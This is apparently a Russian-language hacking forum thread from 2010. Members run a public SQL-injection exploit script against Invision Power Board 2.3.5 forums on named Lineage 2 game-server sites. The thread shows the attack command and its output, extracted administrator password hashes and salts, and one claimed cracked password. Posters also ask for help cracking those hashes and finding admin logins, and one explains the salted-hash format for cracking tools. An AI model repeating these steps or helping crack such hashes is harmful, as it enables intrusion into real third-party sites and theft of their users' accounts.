[Уязвимость] Рабочая уязвимость на l2europe.net (сервер из топ15)

[Underwhy]

Проблема возникла потому-что после /forum/ стоит -

la2revo.ru

Invision Power Board <= 2.3.5 Multiple Vulnerabilities
------------------------------------------------------
Update by Elekt version 1.5 ::[TURBO]::

Attack(s):

+ [18.04.2010 14:56:40]
+ [Ссылки могут видеть только зарегистрированные пользователи. ]
/ IDS bypass: 1
/ Cheking sql-injection..
- Forum unvulnerable
/ Try [Ссылки могут видеть только зарегистрированные пользователи. ]
+ [18.04.2010 14:56:40]
+ Total: 1

[slepp]

Цитата: C:\Documents and Settings\Администратор\1\Php>php.exe 2.3.5-ipb-multi.php -attac k 3 -url [Ссылки могут видеть только зарегистрированные пользователи. ] -uid 1 Invision Power Board <= 2.3.5 Multiple Vulnerabilities ------------------------------------------------------ Update by Elekt version 1.5 ::[TURBO]:: Attack(s): + [06.04.2010 13:28:20] + [Ссылки могут видеть только зарегистрированные пользователи. ] / IDS bypass: 1 / Cheking sql-injection.. + Forum vulnerable! / Using default table prefix: ibf_ + Prefix ibf_ is correct + Using targeted user id 1 / Trying to get the password hash + pass_hash=4115d1f83c891cdd27afe04bd4ca8eb6 + Ok, using hash 4115d1f83c891cdd27afe04bd4ca8eb6 / Trying to get the password salt + pass_salt=MhXDN + Ok, using salt MhXDN + Enjoy! + [06.04.2010 13:28:55] + Total: 181

пользуйтесь дальше хеша я не продвинулся)

[Chipito]

А нельзя ли без расшифроки хеша зайти на форум через хеш?

[Helko]

Цитата: Сообщение от chipito А нельзя ли без расшифроки хеша зайти на форум через хеш?

к сожалению нет

[langes]

Цитата: Сообщение от Underwhy Проблема возникла потому-что после /forum/ стоит - la2revo.ru Invision Power Board <= 2.3.5 Multiple Vulnerabilities ------------------------------------------------------ Update by Elekt version 1.5 ::[TURBO]:: Attack(s): + [18.04.2010 14:56:40] + [Ссылки могут видеть только зарегистрированные пользователи. ] / IDS bypass: 1 / Cheking sql-injection.. - Forum unvulnerable / Try [Ссылки могут видеть только зарегистрированные пользователи. ] + [18.04.2010 14:56:40] + Total: 1

Код:

 Attack(s):

 + [06.04.2010 22:57:13]
 + http://***
 / IDS bypass: 1
 / Cheking sql-injection..
 - Script not found
 / Try http://***/***?s=&act=xmlout&do=check-display-name&name
=%2527
 + [06.04.2010 22:57:14]
 + Total: 1

из-за чего может возникать данная ошибка?

[cavern]

Код:

 + http://l2leona.ru/forum/
 / IDS bypass: 1
 / Cheking sql-injection..
 + Forum vulnerable!
 / Using default table prefix: ibf_
 + Prefix ibf_ is correct
 + Using targeted user id 2
 / Trying to get the password hash
 + pass_hash=f90845fb9872edcf0ece92f0fb862cfb
 + Ok, using hash f90845fb9872edcf0ece92f0fb862cfb
 / Trying to get the password salt
 + pass_salt=2e:|j
 + Ok, using salt 2e:|j
 + Enjoy!

 + [06.04.2010 23:18:29]
 + Total: 188

расшифровал пароль: skyline
а как логин узнать?

[Ilnas]

Думаю это очевидно, смотри кто на форуме админ

[sekaskissa]

если ктото может помогите расшифровать 4115d1f83c891cdd27afe04bd4ca8eb6 вот эту бяку(

[shamrik]

Цитата: Сообщение от Bomjke Без соли ?

hash 4115d1f83c891cdd27afe04bd4ca8eb6
salt MhXDN
я брутил полным перебором, 8 символов, большие + малые буквы + цыфры, безрезультатно

[TakeThat]

Помогите расшифровать..
pass_hash=15cc4c50a75cb2d3cbf6223a817132c0

[langes]

[Ссылки могут видеть только зарегистрированные пользователи. ]
что делать?)

[Chipito]

С логином напряги,в IPB есть имя для отображения и сам логин,тоисть пасс есть а вот логина нету=)

[SandeL]

Народ сори за тупой вопрос

/ IDS bypass: 1
/ Cheking sql-injection..
+ Forum vulnerable!
/ Using default table prefix: ibf_
+ Prefix ibf_ is correct
+ Using targeted user id 1
/ Trying to get the password hash
/
+ Ok, using hash 140db6898b1ce6afc16e5a581d6a1379 <<<<Это хеш??
/ Trying to get the password salt
/
+ Ok, using salt TxqKE <<<<А это чо такое понять немогу
+ Enjoy!

+ [07.04.2010 22:55:49]
+ Total: 182

[Chipito]

В ипб 2.0+ начали ложить сальт,если расшифровуеш в пассворд про нада ставить хеш тайп md5(md5($salt),md5($pass)) [PHP]

[fuzzion]

_http://www.denwer.ru/packages/base_php52.html

этот подойдет